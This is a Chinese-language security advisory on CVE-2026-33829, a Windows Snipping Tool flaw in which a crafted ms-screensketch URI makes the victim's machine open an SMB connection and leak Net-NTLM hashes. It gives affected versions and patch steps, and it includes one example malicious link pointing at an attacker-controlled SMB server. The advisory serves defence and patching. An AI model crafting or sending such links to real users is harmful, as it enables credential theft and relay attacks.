Windows 截图工具 哈希凭据泄露漏洞(CVE-2026-33829) ,360已修复
- 2026-04-20 11:22:26
Windows 截图工具曝出高危欺骗漏洞(CVE-2026-33829,CVSS 4.3),攻击者可构造恶意 URI 链接诱导用户点击,导致目标主机发起 SMB 连接,从而窃取用户 Net-NTLM 哈希凭据。
目前 360 漏洞研究院已成功复现该漏洞并验证了危害。本文包含完整影响范围、修复方案、技术原理与复现细节,建议用户立即升级。
漏洞概述 | |||
漏洞名称 | Windows 截图工具欺骗漏洞 | ||
漏洞编号 | CVE-2026-33829 | ||
公开时间 | 2026/4/14 | POC状态 | 已公开 |
漏洞类型 | 欺骗漏洞 | EXP状态 | 未公开 |
利用可能性 | 低 | 技术细节状态 | 已公开 |
CVSS 3.1 | 4.3 | 在野利用状态 | 未发现 |
01
漏洞影响范围
受影响的软件版本:
Windows 11
Version 26H1 < 10.0.28000.1836
Version 25H2 < 10.0.26200.8246
Version 24H2 < 10.0.26100.8246
Version 23H2 < 10.0.22631.6936
Windows 10
Version 22H2 < 10.0.19045.7184
Version 21H2 < 10.0.19044.7184
Version 1809 < 10.0.17763.8644
Version 1607 < 10.0.14393.9060
Windows Server
Windows Server 2025 < 10.0.26100.32690
Windows Server 2022, 23H2 < 10.0.25398.2274
Windows Server 2022 < 10.0.20348.5020
Windows Server 2019 < 10.0.17763.8644
Windows Server 2016 < 10.0.14393.9060
Windows Server 2012 R2 < 6.3.9600.23132
Windows Server 2012 < 6.2.9200.26026
02
修复建议
正式防护方案
方法一.使用Windows Update更新
自动更新:
Microsoft Update默认启用,当系统检测到可用更新时,将会自动下载更新并在下一次启动时安装。
手动更新:
1、点击“开始菜单”或按Windows快捷键,点击进入“设置”。
2、选择“更新和安全”,进入“Windows更新”。
3、选择“检查更新”,等待系统将自动检查并下载可用更新。
4、重启计算机,安装更新系统重新启动后,可通过进入“Windows更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新,可以点击该更新名称进入微软官方更新描述链接,点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”,然后在新链接中选择适用于目标系统的补丁进行下载并安装。
方法二. 手动安装补丁
Microsoft官方下载相应补丁进行更新。
安全更新下载链接:https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33829
1.点击打开上述链接。
2.在微软公告页面底部左侧【产品】选择相应的系统类型,点击右侧【下载】处打开补丁下载链接。
3.点击【安全更新】,打开补丁下载页面,下载相应补丁并进行安装。
4.安装完成后重启计算机。
03
漏洞描述
Windows 截图工具在处理自定义 URI 协议 ms-screensketch 时存在输入验证缺陷。该应用注册的深层链接允许通过 filePath 参数指定远程文件路径。由于未对参数值进行充分校验,当用户访问恶意构造的链接(例如 ms-screensketch:edit?filePath=\\攻击者控制的SMB服务器\image.png)时,截图工具会尝试建立 SMB 连接以访问远程资源,从而在用户无感知的情况下发起 NTLM 身份认证协商,导致当前用户的 Net-NTLM 哈希凭据泄露至攻击者控制的服务器。成功利用此漏洞可造成凭据中继或离线破解风险,攻击常借助社会工程学诱导用户点击伪装链接触发。
04
漏洞复现
360漏洞研究院已成功复现 Windows 截图工具欺骗漏洞(CVE-2026-33829),通过 Impacket 工具库监听并发送构造的协议链接,证实受害者点击后会立即泄露 Net-NTLMv2 哈希,成功验证漏洞危害。

CVE-2026-33829 Windows 截图工具欺骗漏洞复现
05
时间线
2026年04月16日,360漏洞研究院发布本安全风险通告。
06
参考链接
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829
07
更多漏洞情报
建议您订阅360数字安全-漏洞情报服务,获取更多漏洞情报详情以及处置建议,让您的企业远离漏洞威胁。
邮箱:360VRI@360.cn
网址:https://vi.loudongyun.360.net
360官网:www.360.cn